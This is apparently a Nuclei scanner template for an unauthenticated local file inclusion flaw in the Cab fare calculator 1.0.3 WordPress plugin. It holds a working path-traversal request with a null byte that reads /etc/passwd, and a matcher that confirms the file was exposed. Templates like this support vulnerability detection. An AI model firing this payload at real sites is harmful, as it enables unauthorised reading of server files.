id: cab-fare-calculator-lfi

info:
  name: Cab fare calculator 1.0.3 - Unauthenticated Local File Inclusion
  author: Hassan Khan Yusufzai - Splint3r7
  severity: high
  reference:
    - https://www.exploit-db.com/exploits/50843
    - https://wordpress.org/plugins/cab-fare-calculator
  tags: wordpress,wp-plugin,lfi,wp

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1'

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
